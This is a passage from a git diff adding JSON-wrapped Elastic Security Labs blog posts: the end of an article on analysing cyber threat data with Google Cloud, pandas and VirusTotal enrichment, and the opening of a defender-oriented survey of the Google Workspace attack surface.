valuable in understanding and interpreting cybersecurity alerts.\n\n**Example of data enrichment: Integrating VirusTotal reputation data**\nA common method of data enrichment in cybersecurity involves incorporating reputation scores from external threat intelligence services like [VirusTotal](https://www.virustotal.com/gui/home/search) (VT). This process typically includes:\n\n 1. 
**Fetching reputation data:** Using an API key from VT, we can query for reputational data based on unique identifiers in our dataset, such as SHA256 hashes of binaries.\n\n```\nimport requests\n\ndef classify_positives(positives):\n    # Example thresholds for illustration; tune these to your own reporting needs\n    if positives == 0:\n        return \"clean\"\n    elif positives <= 5:\n        return \"suspicious\"\n    else:\n        return \"malicious\"\n\ndef get_reputation(sha256, API_KEY, URL):\n    params = {'apikey': API_KEY, 'resource': sha256}\n    response = requests.get(URL, params=params)\n    json_response = response.json()\n\n    if json_response.get(\"response_code\") == 1:\n        positives = json_response.get(\"positives\", 0)\n        return classify_positives(positives)\n    else:\n        return \"unknown\"\n```\n\nIn this snippet, `classify_positives` is a custom helper (sketched above with example thresholds) that classifies the reputation based on the number of antivirus engines that flagged the file as malicious.\n\n 2. **Adding reputation data to the dataset:** The reputation data fetched from VirusTotal is then integrated into the existing dataset. This is done by applying the `get_reputation` function to each relevant entry in the DataFrame.\n\n```\ndf['reputation'] = df['sha256'].apply(lambda x: get_reputation(x, API_KEY, URL))\n```\n\nHere, a new column named `reputation` is added to the dataframe, providing an additional layer of information about each binary based on its detection rate in VirusTotal.\n\nThis method of data enrichment is just one of many options available for enhancing cybersecurity threat data. By utilizing robust helper functions and tapping into external data repositories, analysts can significantly enrich their datasets. This enrichment allows for a more comprehensive understanding of the data, leading to a more informed and nuanced analysis. The techniques demonstrated here are part of a broader range of advanced data manipulation methods that can further refine cybersecurity data analysis.\n\n## Normalization\n\nEspecially when dealing with varied datasets in cybersecurity, such as endpoint alerts and cloud SIEM notifications, normalization may be required to get the most out of your data. 
\n\n**Understanding normalization:** At its core, normalization is about adjusting values measured on different scales to a common scale, ensuring that they are proportionally represented, and reducing redundancy. In the cybersecurity context, this means representing events or alerts in a manner that doesn't unintentionally amplify or reduce their significance.\n\nConsider our endpoint malware dataset. When analyzing trends, say, infections based on malware families or categories, we aim for an accurate representation. However, a single malware infection on an endpoint could generate multiple alerts depending on the Extended Detection and Response (XDR) system. If left unchecked, this could significantly skew our understanding of the threat landscape. To counteract this, we consider the Elastic agents, which are deployed as part of the XDR solution. Each endpoint has a unique agent, representing a single infection instance if malware is detected. Therefore, to normalize this dataset, we would \"flatten\" or adjust it based on unique agent IDs. This means, for our analysis, we'd consider the number of unique agent IDs affected by a specific malware family or category rather than the raw number of alerts.\n\n\nExample visualization of malware alert normalization by unique agents\n\nAs depicted in the image above, if we chose to not normalize the malware data in preparation for trend analysis, our key findings would depict inaccurate information. This inaccuracy could be sourced from a plethora of data inconsistencies such as generic YARA rules, programmatic operations that were flagged repeatedly on a single endpoint, and many more.\n\n**Diversifying the approach:** On the other hand, when dealing with endpoint behavior alerts or cloud alerts (from platforms like AWS, GCP, Azure, Google Workspace, and O365), our normalization approach might differ. 
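To ground the agent-based flattening described above, here is a minimal sketch; the `agent_id` and `malware_family` column names are hypothetical stand-ins for the fields in a real alert dataset:

```
import pandas as pd

# Hypothetical alerts: one infected endpoint can raise many alerts for one infection
alerts = pd.DataFrame({
    'agent_id': ['agent-1', 'agent-1', 'agent-1', 'agent-2', 'agent-2'],
    'malware_family': ['FamilyA', 'FamilyA', 'FamilyA', 'FamilyA', 'FamilyB'],
})

# Raw alert counts overstate the trend: FamilyA shows 4 alerts...
raw_counts = alerts.groupby('malware_family').size()

# ...but normalizing on unique agents shows only 2 affected endpoints
normalized = alerts.groupby('malware_family')['agent_id'].nunique()
```

Counting unique agents rather than raw alerts keeps a single noisy endpoint from dominating the trend.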
These datasets could have their own nuances and may not require the same \"flattening\" technique used for malware alerts.\n\n**Conceptualizing normalization options:** Remember, the goal of normalization is to reduce redundancy in your data. Make sure to keep your operations as atomic as possible in case you need to go back and tweak them later. This is especially true when performing both normalization and standardization. Sometimes these can be difficult to separate, and you may have to go back and forth between the two. Analysts have a wealth of options here, from [Min-Max](https://www.geeksforgeeks.org/data-pre-processing-wit-sklearn-using-standard-and-minmax-scaler/) scaling, where values are shifted and rescaled to range between 0 and 1, to [Z-score](https://www.statology.org/z-score-python/) normalization (or standardization), where values are centered around zero and expressed in standard deviations from the mean. The choice of technique depends on the nature of the data and the specific requirements of the analysis.\n\nIn essence, normalization ensures that our cybersecurity analysis is based on a level playing field, giving stakeholders an accurate view of the threat environment without undue distortions. This is a critical step before trend analysis.\n\n## Anomaly detection: Refining the process of data analysis\n\nIn the realm of cybersecurity analytics, a one-size-fits-all approach to anomaly detection does not exist. The process is highly dependent on the specific characteristics of the data at hand. The primary goal is to identify and address outliers that could potentially distort the analysis. This requires a dynamic and adaptable methodology, where understanding the nuances of the dataset is crucial.\n\nAnomaly detection in cybersecurity involves exploring various techniques and methodologies, each suited to different types of data irregularities. 
The strategy is not to rigidly apply a single method but rather to use a deep understanding of the data to select the most appropriate technique for each situation. The emphasis is on flexibility and adaptability, ensuring that the approach chosen provides the clearest and most accurate insights into the data.\n\n### Statistical methods – The backbone of analysis:\n\nStatistical analysis is always an option for anomaly detection, especially with cybersecurity data. By understanding the inherent distribution and central tendencies of our data, we can highlight values that deviate from the norm. A simple yet powerful method, the Z-score, gauges the distance of a data point from the mean in terms of standard deviations.\n\n```\nimport numpy as np\n\n# Z-scores require a numeric feature; here we derive them from alert counts per technique\ntechnique_counts = df.groupby('mitre_technique').size()\nz_scores = np.abs((technique_counts - technique_counts.mean()) / technique_counts.std())\n\noutliers = technique_counts[z_scores > 3] # Conventionally, a Z-score above 3 signals an outlier\n```\n\n**Why this matters:** This method allows us to quantitatively gauge the significance of a data point's deviation. Such outliers can heavily skew aggregate metrics like the mean or even detrimentally influence machine learning model training. Remember, outliers should not always be removed; it is all about context! Sometimes you may even be looking for the outliers specifically.\n\n**Key library:** While we utilize [NumPy](https://numpy.org/) above, [SciPy](https://scipy.org/) can also be employed for intricate statistical operations.\n\n### Aggregations and sorting – Unraveling layers:\n\nData often presents itself in layers. By starting with a high-level view and gradually diving into specifics, we can locate inconsistencies or anomalies. 
When we aggregate by categories such as the MITRE ATT&CK tactic, and then delve deeper, we gradually uncover the finer details and potential anomalies as we go from technique to rule logic and alert context.\n\n```\n# Aggregating by tactics first\ntactic_agg = df.groupby('mitre_tactic').size().sort_values(ascending=False)\n```\n\nFrom here, we can identify the most common tactics and choose the tactic with the highest count. We then filter our data for this tactic to identify the most common technique associated with it. Techniques are often more specific than tactics and thus add more explanation about what we may be observing. Following the same approach, we can then filter for this specific technique, aggregate by rule, and review that detection rule for more context. The goal here is to find “noisy” rules that may be skewing our dataset; the related alerts then need to be removed. This cycle can be repeated until outliers are removed and the percentages appear more accurate.\n\n**Why this matters:** This layered analysis approach ensures no stone is left unturned. By navigating from the general to the specific, we systematically weed out inconsistencies.\n\n**Key library:** Pandas remains the hero, equipped to handle data-wrangling chores with finesse.\n\n### Visualization – The lens of clarity:\n\nSometimes, the human eye, when aided with the right visual representation, can intuitively detect what even the most complex algorithms might miss. 
A boxplot, for instance, not only shows the central tendency and spread of data but distinctly marks outliers.\n\n```\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nplt.figure(figsize=(12, 8))\nsns.boxplot(x='Malware Family', y='Malware Score', data=df)\nplt.title('Distribution of Malware Scores by Family')\nplt.show()\n```\n\n\nExample visualization of malware distribution scores by family from an example dataset\n\n**Why this matters:** Visualization transforms abstract data into tangible insights. It offers a perspective that's both holistic and granular, depending on the need.\n\n**Key library:** Seaborn, built atop Matplotlib, excels at turning data into visual stories.\n\n### Machine learning – The advanced guard:\n\nWhen traditional methods are insufficient, machine learning steps in, offering a predictive lens to anomalies. While many algorithms are designed to classify known patterns, some, like autoencoders in deep learning, learn to recreate 'normal' data, marking any deviation as an anomaly.\n\n**Why this matters:** As data complexity grows, the boundaries of what constitutes an anomaly become blurrier. Machine learning offers adaptive solutions that evolve with the data.\n\n**Key libraries:** [Scikit-learn](https://scikit-learn.org/stable/) is a treasure trove for user-friendly, classical machine learning techniques, while [PyTorch](https://pytorch.org/) brings the power of deep learning to the table.\n\nPerfecting anomaly detection in data analysis is similar to refining a complex skill through practice and iteration. The process often involves trial and error, with each iteration enhancing the analyst's familiarity with the dataset. This progressive understanding is key to ensuring that the final analysis is both robust and insightful. 
In data analysis, the journey of exploration and refinement is as valuable as the final outcome itself.\n\nBefore proceeding to in-depth trend analysis, it's very important to ensure that the data is thoroughly pre-processed and transformed. Just as precision and reliability are essential in any meticulous task, they are equally critical in data analysis. The steps of cleaning, normalizing, enriching, and removing anomalies form the groundwork for deriving meaningful insights. Without these careful preparations, the analysis could range from slightly inaccurate to significantly misleading. It's only when the data is properly refined and free of distortions that it can reveal its true value, leading to reliable and actionable insights in trend analysis.\n\n# Trend analysis: Unveiling patterns in data\n\nIn the dynamic field of cybersecurity, where threat actors continually evolve their tactics, techniques, and procedures (TTPs), staying ahead of emerging threats is critical. Trend analysis serves as a vital tool in this regard, offering a way to identify and understand patterns and behaviors in cyber threats over time.\n\nBy utilizing the MITRE ATT&CK framework, cybersecurity professionals have a structured and standardized approach to analyzing and categorizing these evolving threats. This framework aids in systematically identifying patterns in attack methodologies, enabling defenders to anticipate and respond to changes in adversary behaviors effectively.\n\nTrend analysis, through the lens of the MITRE ATT&CK framework, transforms raw cybersecurity telemetry into actionable intelligence. It allows analysts to track the evolution of attack strategies and to adapt their defense mechanisms accordingly, ensuring a proactive stance in cybersecurity management.\n\n## Beginning with a broad overview: Aggregation and sorting\n\nCommencing our analysis with a bird's eye view is paramount. 
This panoramic perspective allows us to first pinpoint the broader tactics in play before delving into the more granular techniques and underlying detection rules.\n\n**Top tactics:** By aggregating our data based on MITRE ATT&CK tactics, we can discern the overarching strategies adversaries lean toward. This paints a picture of their primary objectives, be it initial access, execution, or exfiltration.\n\n```\ntop_tactics = df.groupby('mitre_tactic').size().sort_values(ascending=False)\n```\n\n**Zooming into techniques:** Once we've identified a prominent tactic, we can then funnel our attention to the techniques linked to that tactic. This reveals the specific modus operandi of adversaries.\n\n```\nchosen_tactic = 'Execution'\n\ntechniques_under_tactic = df[df['mitre_tactic'] == chosen_tactic]\ntop_techniques = techniques_under_tactic.groupby('mitre_technique').size().sort_values(ascending=False)\n```\n\n**Detection rules and logic:** With our spotlight on a specific technique, it's time to delve deeper, identifying the detection rules that triggered alerts. This not only showcases what was detected, but by reviewing the detection logic, we also gain an understanding of the precise behaviors and patterns that were flagged.\n\n```\nchosen_technique = 'Scripting'\n\nrules_for_technique = techniques_under_tactic[techniques_under_tactic['mitre_technique'] == chosen_technique]\n\ntop_rules = rules_for_technique.groupby('detection_rule').size().sort_values(ascending=False)\n```\n\nThis hierarchical, cascading approach is akin to peeling an onion. With each layer, we expose more intricate details, refining our perspective and sharpening our insights.\n\n## The power of time: Time series analysis\n\nIn the realm of cybersecurity, time isn't just a metric; it's a narrative. Timestamps, often overlooked, are goldmines of insights. 
Time series analysis allows us to plot events over time, revealing patterns, spikes, or lulls that might be indicative of adversary campaigns, specific attack waves, or dormancy periods.\n\nFor instance, plotting endpoint malware alerts over time can unveil an adversary's operational hours or spotlight a synchronized, multi-vector attack:\n\n```\nimport matplotlib.pyplot as plt\n\n# Extract and plot endpoint alerts over time ('timestamp' must be a datetime column)\ndf.set_index('timestamp')['endpoint_alert'].resample('D').count().plot()\nplt.title('Endpoint Malware Alerts Over Time')\nplt.xlabel('Time')\nplt.ylabel('Alert Count')\nplt.show()\n```\n\nTime series analysis doesn't just highlight \"when\" but often provides insights into the \"why\" behind certain spikes or anomalies. It aids in correlating external events (like the release of a new exploit) to internal data trends.\n\n## Correlation analysis\n\nUnderstanding relationships between different sets of data can offer valuable insights. For instance, a spike in one type of alert could correlate with another type of activity in the system, shedding light on multi-stage attack campaigns or diversion strategies.\n\n```\n# Finding correlation between an increase in login attempts and data exfiltration activities\ncorrelation_value = df['login_attempts'].corr(df['data_exfil_activity'])\n```\n\nThis analysis, with the help of pandas [corr](https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.corr.html), can help in discerning whether multiple seemingly isolated activities are part of a coordinated attack chain.\n\nCorrelation does not have to be metric-driven, either. When analyzing threats, it is easy to find value and new insights by comparing older findings to the new ones.\n\n## Machine learning & anomaly detection\n\nWith the vast volume of data, manual analysis becomes impractical. Machine learning can assist in identifying patterns and anomalies that might escape the human eye. 
Algorithms like [Isolation Forest](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.IsolationForest.html) or [K-nearest neighbor](https://scikit-learn.org/stable/modules/neighbors.html) (KNN) are commonly used to spot deviations or clusters of related data.\n\n```\nfrom sklearn.ensemble import IsolationForest\n\n# Assuming 'feature_set' contains relevant metrics for analysis\nclf = IsolationForest(contamination=0.05)\nanomalies = clf.fit_predict(feature_set)\n```\n\nHere, the `anomalies` variable will flag data points that deviate from the norm, helping analysts pinpoint unusual behavior swiftly.\n\n## Behavioral patterns & endpoint data analysis\n\nAnalyzing endpoint behavioral data collected from detection rules allows us to unearth overarching patterns and trends that can be indicative of broader threat landscapes, cyber campaigns, or evolving attacker TTPs.\n\n**Tactic progression patterns:** By monitoring the sequence of detected behaviors over time, we can spot patterns in how adversaries move through their attack chain. For instance, if there's a consistent trend where initial access techniques are followed by execution and then lateral movement, it's indicative of a common attacker playbook being employed.\n\n**Command-line trend analysis:** Even within malicious command-line arguments, certain patterns or sequences can emerge. Monitoring the most frequently detected malicious arguments can give insights into favored attack tools or scripts.\n\nExample:\n\n```\n# Most frequently detected malicious command lines\ntop_malicious_commands = df.groupby('malicious_command_line').size().sort_values(ascending=False).head(10)\n```\n\n**Process interaction trends:** While individual parent-child process relationships can be malicious, spotting trends in these interactions can hint at widespread malware campaigns or attacker TTPs. 
For instance, if a large subset of endpoints is showing the same unusual process interaction, it might suggest a common threat.\n\n**Temporal behavior patterns:** Just as with other types of data, the temporal aspect of endpoint behavioral data can be enlightening. Analyzing the frequency and timing of certain malicious behaviors can hint at attacker operational hours or campaign durations.\n\nExample:\n\n```\n# Analyzing frequency of a specific malicious behavior over time\nmonthly_data = df.pivot_table(index='timestamp', columns='tactic', values='count', aggfunc='sum').resample('M').sum()\n\nax = monthly_data[['execution', 'defense-evasion']].plot(kind='bar', stacked=False, figsize=(12,6))\n\nplt.title(\"Frequency of 'execution' and 'defense-evasion' Tactics Over Time\")\n\nplt.ylabel(\"Count\")\nax.set_xticklabels([x.strftime('%B-%Y') for x in monthly_data.index])\nplt.xticks(rotation=45)\nplt.tight_layout()\nplt.show()\n```\n\n\nNote: This image is from example data and not from the Global Threat Report\n\nBy aggregating and analyzing endpoint behavioral data at a macro level, we don't just identify isolated threats but can spot waves, trends, and emerging patterns. This broader perspective empowers cybersecurity teams to anticipate, prepare for, and counter large-scale cyber threats more effectively.\n\nWhile these are some examples of how to perform trend analysis, there is no right or wrong approach. Every analyst has their own preference or set of questions they or stakeholders may want to ask. 
Here are some additional questions or queries analysts may have for cybersecurity data when doing trend analysis.\n\n - What are the top three tactics being leveraged by adversaries this quarter?\n - Which detection rules are triggering the most, and is there a common thread?\n - Are there any time-based patterns in endpoint alerts, possibly hinting at an adversary's timezone?\n - How have cloud alerts evolved with the migration of more services to the cloud?\n - Which malware families are becoming more prevalent, and what might be the cause?\n - Do the data patterns suggest any seasonality, like increased activities towards year-end?\n - Are there correlations between external events and spikes in cyber activities?\n - How does the weekday data differ from weekends in terms of alerts and attacks?\n - Which organizational assets are most targeted, and are their defenses up-to-date?\n - Are there any signs of internal threats or unusual behaviors among privileged accounts?\n\nTrend analysis in cybersecurity is a dynamic process. While we've laid down some foundational techniques and questions, there are myriad ways to approach this vast domain. Each analyst may have their preferences, tools, and methodologies, and that's perfectly fine. The essence lies in continuously evolving and adapting our approach while staying cognizant of the ever-changing threat landscape of each ecosystem exposed to threats.\n\n# Reduction: Streamlining for clarity\n\nHaving progressed through the initial stages of our data analysis, we now enter the next phase: reduction. 
This step is about refining and concentrating our comprehensive data into a more digestible and focused format.\n\nRecap of the analysis journey so far:\n\n - **Extraction:** The initial phase involved setting up our Google Cloud environment and selecting relevant datasets for our analysis.\n - **Pre-processing and transformation:** At this stage, the data was extracted, processed, and transformed within our Colab notebooks, preparing it for detailed analysis.\n - **Trend analysis:** This phase provided in-depth insights into cyber attack tactics, techniques, and malware, forming the core of our analysis.\n\nWhile the detailed data in our Colab Notebooks is extensive and informative for an analyst, it might be too complex for a broader audience. Therefore, the reduction phase focuses on distilling this information into a more concise and accessible form. The aim is to make the findings clear and understandable, ensuring that they can be effectively communicated and utilized across various departments or stakeholders.\n\n## Selecting and aggregating key data points\n\nTo communicate our findings effectively, we must tailor the presentation to the audience's needs. Not every stakeholder requires the full depth of collected data; many prefer a summarized version that highlights the most actionable points. 
This is where data selection and aggregation come into play, focusing on the most vital elements and presenting them in an accessible format.\n\nHere's an example of how to use Pandas to aggregate and condense a dataset, focusing on key aspects of endpoint behavior:\n\n```\nrequired_endpoint_behavior_cols = ['rule_name','host_os_type','tactic_name','technique_name']\n\nreduced_behavior_df = (\n    df.groupby(required_endpoint_behavior_cols)\n    .size()\n    .reset_index(name='count')\n    .sort_values(by='count', ascending=False)\n    .reset_index(drop=True)\n)\n\ncolumns = {\n    'rule_name': 'Rule Name',\n    'host_os_type': 'Host OS Type',\n    'tactic_name': 'Tactic',\n    'technique_name': 'Technique',\n    'count': 'Alerts'\n}\n\nreduced_behavior_df = reduced_behavior_df.rename(columns=columns)\n```\n\nOne remarkable aspect of this code and process is the flexibility it offers. For instance, we can group our data by various data points tailored to our needs. Interested in identifying popular tactics used by adversaries? Group by the MITRE ATT&CK tactic. Want to shed light on masquerading malicious binaries? Revisit extraction to add more Elastic Common Schema (ECS) fields such as file path, filter on Defense Evasion, and aggregate to reveal the commonly trodden paths. This approach ensures we create datasets that are both enlightening and not overwhelmingly rich, tailor-made for stakeholders who wish to understand the origins of our analysis.\n\nThis process involves grouping the data by relevant categories, such as rule name, host OS type, and MITRE ATT&CK tactics and techniques, and then counting the occurrences. This method helps in identifying the most prevalent patterns and trends in the data.\n\n\nDiagram example of data aggregation to obtain reduced dataset\n\n## Exporting reduced data to Google Sheets for accessibility\n\nThe reduced data, now stored as a dataframe in memory, is ready to be exported. 
We use Google Sheets as the platform for sharing these insights because of its wide accessibility and user-friendly interface. The process of exporting data to Google Sheets is straightforward and efficient, thanks to the integration with Google Cloud services.\n\nHere's an example of how the data can be uploaded to Google Sheets using Python from our Colab notebook:\n\n```\nimport google.auth\nimport gspread\nfrom google.colab import auth\nfrom gspread_dataframe import set_with_dataframe\n\nauth.authenticate_user()\ncredentials, project = google.auth.default()\ngc = gspread.authorize(credentials)\nworkbook = gc.open_by_key(\"SHEET_ID\")\nbehavior_sheet_name = 'NAME_OF_TARGET_SHEET'\nendpoint_behavior_worksheet = workbook.worksheet(behavior_sheet_name)\nset_with_dataframe(endpoint_behavior_worksheet, reduced_behavior_df)\n```\n\nWith a few simple lines of code, we have effectively transferred our data analysis results to Google Sheets. This approach is widely used due to its accessibility and ease of use. However, there are multiple other methods to present data, each suited to different requirements and audiences. For instance, some might opt for a platform like [Looker](https://cloud.google.com/looker?hl=en) to present the processed data in a more dynamic dashboard format. This method is particularly useful for creating interactive and visually engaging presentations of data. It ensures that even stakeholders who may not be familiar with the technical aspects of data analysis, such as those working in Jupyter Notebooks, can easily understand and derive value from the insights.\n\nThis streamlined process of data reduction and presentation can be applied to different types of datasets, such as cloud SIEM alerts, endpoint behavior alerts, or malware alerts. The objective remains the same: to simplify and concentrate the data for clear and actionable insights.\n\n# Presentation: Showcasing the insights\n\nAfter meticulously refining our datasets, we now focus on the final stage: the presentation. 
Here we take our datasets, now neatly organized in platforms like Google Sheets or Looker, and transform them into a format that is both informative and engaging.\n\n## Pivot tables for in-depth analysis\n\nUsing pivot tables, we can create a comprehensive overview of our trend analysis findings. These tables allow us to display data in a multi-dimensional manner, offering insights into various aspects of cybersecurity, such as prevalent MITRE ATT&CK tactics, chosen techniques, and preferred malware families.\n\nOur approach to data visualization involves:\n\n - **Broad overview with MITRE ATT&CK tactics:** Starting with a general perspective, we use pivot tables to overview the different tactics employed in cyber threats.\n - **Detailed breakdown:** From this panoramic view, we delve deeper, creating separate pivot tables for each popular tactic and then branching out into detailed analyses for each technique and specific detection rule.\n\nThis methodical process helps to uncover the intricacies of detection logic and alerts, effectively narrating the story of the cyber threat landscape.\n\n\nDiagram showcasing aggregations funnel into contextual report information\n\n**Accessibility across audiences:** Our data presentations are designed to cater to a wide range of audiences, from those deeply versed in data science to those who prefer a more straightforward understanding. The Google Workspace ecosystem facilitates the sharing of these insights, allowing pivot tables, reduced datasets, and other elements to be easily accessible to all involved in the report-making process.\n\n**Integrating visualizations into reports:** When crafting a report, for example, in Google Docs, the integration of charts and tables from Google Sheets is seamless. 
This integration ensures that any modifications in the datasets or pivot tables are easily updated in the report, maintaining the efficiency and coherence of the presentation.\n\n**Tailoring the presentation to the audience:** The presentation of data insights is not just about conveying information; it's about doing so in a visually appealing and digestible manner. For a more tech-savvy audience, an interactive Colab Notebook with dynamic charts and functions may be ideal. In contrast, for marketing or design teams, a well-designed dashboard in Looker might be more appropriate. The key is to ensure that the presentation is clear, concise, and visually attractive, tailored to the specific preferences and needs of the audience.\n\n# Conclusion: Reflecting on the data analysis journey\n\nAs we conclude, it's valuable to reflect on the territory we've navigated in analyzing cyber threat data. This journey involved several key stages, each contributing significantly to our final insights.\n\n## Journey through Google's Cloud ecosystem\n\nOur path took us through several Google Cloud services, including GCP, GCE, Colab Notebooks, and Google Workspace. Each played a pivotal role:\n\n**Data exploration:** We began with a set of cyber-related questions we wanted to answer and explored what vast datasets we had available to us. In this blog, we focused solely on telemetry being available in BigQuery.\n**Data extraction:** We began by extracting raw data, utilizing BigQuery to efficiently handle large volumes of data. 
Extraction occurred both in BigQuery and from within our Colab notebooks.\n**Data wrangling and processing:** The power of Python and the pandas library was leveraged to clean, aggregate, and refine this data, much like a chef skillfully preparing ingredients.\n**Trend analysis:** We then performed trend analysis on our refined datasets using several methodologies to glean valuable insights into adversary tactics, techniques, and procedures over time.\n**Reduction:** Building on our trend analysis, we aggregated our different datasets by targeted data points in preparation for presentation to stakeholders and peers.\n**Transition to presentation:** The ease of moving from data analytics to presentation within a web browser highlighted the agility of our tools, facilitating a seamless workflow.\n\n## Modularity and flexibility in workflow\n\nAn essential aspect of our approach was the modular nature of our workflow. Each phase, from data extraction to presentation, featured interchangeable components in the Google Cloud ecosystem, allowing us to tailor the process to specific needs:\n\n**Versatile tools:** Google Cloud Platform offered a diverse range of tools and options, enabling flexibility in data storage, analysis, and presentation.\n**Customized analysis path:** Depending on the specific requirements of our analysis, we could adapt and choose different tools and methods, ensuring a tailored approach to each dataset.\n**Authentication and authorization:** Because our assets were housed in the Google Cloud ecosystem, access to different tools, sites, and data was painless, ensuring a smooth transition between services.\n\n## Orchestration and tool synchronization\n\nThe synergy between our technical skills and the chosen tools was crucial. This harmonization ensured that the analytical process was not only effective for this project but also set the foundation for more efficient and insightful future analyses. 
The tools were used to augment our capabilities, keeping the focus on deriving meaningful insights rather than getting entangled in technical complexities.\n\nIn summary, this journey through data analysis emphasized the importance of a well-thought-out approach, leveraging the right tools and techniques, and the adaptability to meet the demands of cyber threat data analysis. The end result is not just a set of findings but a refined methodology that can be applied to future data analysis endeavors in the ever-evolving field of cybersecurity.\n\n# Call to Action: Embarking on your own data analytics journey\n\nYour analytical workspace is ready! What innovative approaches or experiences with Google Cloud or other data analytics platforms can you bring to the table? The realm of data analytics is vast and varied, and although each analyst brings a unique touch, the underlying methods and principles are universal.\n\nThe objective is not solely to excel in your current analytical projects but to continually enhance and adapt your techniques. This ongoing refinement ensures that your future endeavors in data analysis will be even more productive, enlightening, and impactful. Dive in and explore the world of data analytics with Google Cloud!\n\nWe encourage any feedback and engagement for this topic! If you prefer to do so, feel free to engage us in Elastic’s public [#security](https://elasticstack.slack.com/archives/C018PDGK6JU) Slack channel."
+ },
+ "title": "Google Cloud for Cyber Data Analytics",
+ "slug": "google-cloud-for-cyber-data-analytics",
+ "subtitle": "Navigating the seas of cyber threat data with Google Cloud",
+ "date": "2023-12-14",
+ "description": "This article explains how we conduct comprehensive cyber threat data analysis using Google Cloud, from data extraction and preprocessing to trend analysis and presentation. It emphasizes the value of BigQuery, Python, and Google Sheets - showcasing how to refine and visualize data for insightful cybersecurity analysis.",
+ "author": [
+ {
+ "slug": "terrance-dejesus"
+ },
+ {
+ "slug": "eric-forte"
+ }
+ ],
+ "image": "photo-edited-12.png",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "google cloud"
+ ]
+ },
+ "id": "security_labs_content-google_cloud_for_cyber_data_analytics-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_workspace_attack_surface_part_one-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_workspace_attack_surface_part_one-md.json
new file mode 100644
index 00000000000..76cb21d632a
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_workspace_attack_surface_part_one-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Google Workspace Attack Surface\"\nslug: \"google-workspace-attack-surface-part-one\"\ndate: \"2023-01-03\"\nsubtitle: \"Part One: Surveying the Land\"\ndescription: \"During this multipart series, we’ll help you understand what GW is and some of the common risks to be aware of, while encouraging you to take control of your enterprise resources.\"\nauthor:\n - slug: terrance-dejesus\nimage: \"photo-edited-01-e.jpg\"\ncategory:\ntags:\n - threat detection\n - cloud security\n - google workspace\n - google cloud\n---\n\n# Preamble\n\nFormerly known as GSuite, Google Workspace (GW) is a collection of enterprise tools offered by Google. Popular services such as Google Drive, Gmail and Google Forms are used by many small and midsize businesses (SMBs), as well as larger organizations.\n\nWhen referring to security, GW is often mentioned because a threat is abusing or targeting services and resources. As practitioners, it is essential we consider risks associated and plan defenses accordingly. Importantly, Microsoft and Amazon offer some of the same services: if there’s a “least risk” option among them we haven’t seen evidence of it yet, and each prioritizes their own form of visibility.\n\nDuring this multipart series, we’ll help you understand what GW is and some of the common risks to be aware of, while encouraging you to take control of your enterprise resources: - Part One - Surveying the Land - Part Two - Setup Threat Detection with Elastic - Part Three - Detecting Common Threats\n\nIn this publication, readers will learn more about common resources and services in GW and how these are targeted by threats. This will provide an overview of administration, organizational structures, identity access and management (IAM), developer resources, and a few other topics you should think about.\n\nBut before we begin, let’s highlight the importance of organizations also taking ownership of this attack surface. 
If you’re using these enterprise tools and don’t consider them part of your enterprise, that is the challenge to overcome first. Know where your visibility extends to, know which capabilities you can exercise within that range, and don’t mistake vendor-operated for vendor-secured.\n\n# Common Services Targeted by Threats\n\n[Services and applications](https://workspace.google.com/features/) available in GW include cloud storage, email, identity and access management (IAM), chat and much more. Behind the scenes, [developers](https://developers.google.com/workspace) can access application programming interfaces (APIs) to interact programmatically with GW. Together, these services allow organizations of all sizes to provide users with their own Internet-accessible virtual “workspace”. However, threat actors have discovered trivial and advanced methods to abuse these services. While there is plenty of information to cover, we should start with administration as it provides an overview of GW and will help set the stage for more in-depth context about applications or developer resources.\n\n## Administration\n\nFew GW users are aware of the admin console or the settings it exposes, unless they happen to also be an administrator. The admin console is the central command center for GW administrators to manage the services and resources of their organization. The term “organization” is directly referenced by the primary domain registered with GW and therefore is the root node of GW. Only user accounts with administrative roles can sign-in and access their organization’s admin console.\n\n\n\nGW employs a directory service-like structure that defines users, groups, organizational units (OUs), roles and other attributes of the enterprise for easy navigation. 
While the admin console is not inherently a risk, compromised valid accounts ([T1078.004](https://attack.mitre.org/techniques/T1078/004/)) with that level of privilege expose organizations to greater risk.\n\nAside from IAM, administrators use the admin console to manage applications available to their organization. The most popular of these are Gmail, Drive and Docs, Google Meet, Google Forms, Google Sheets and Calendar. Additional Google services can be added, though most, such as Chrome Remote Desktop, are enabled by default when setting up your GW. Depending on the OU configuration, permissions for users to these applications may be inherited from the root OU. The principles of least privilege (PoLP) and application control are critical to reducing organizational risk within GW.\n\n\n\nAdministrators can also manage mobile and endpoint device enrollment, as well as network-related settings from the admin console. Administrators can add devices by uploading a CSV containing the serial number, which can be assigned to a user. For corporate-owned devices, this provides convenient auditing that may unfortunately become necessary. Universal settings for mobile devices are also available, allowing data and setting synchronization for iOS, Android and Google devices. GW allows mobile device management (MDM), allowing admins to apply local changes using [Open Mobile Alliance - Uniform Resources](https://learn.microsoft.com/en-us/troubleshoot/mem/intune/deploy-oma-uris-to-target-csp-via-intune) (OMA-URIs).\n\nCoincidentally, making changes to remote enterprise endpoints is also a popular goal of adversaries.\n\nGW admins have the capability to create and manage Wi-Fi, Ethernet, VPN and Cellular networks. For cellular devices, this is typically done via the Subscription Management Root-Discovery Service (SM-DP), which is used to connect eSIM devices to a mobile network. 
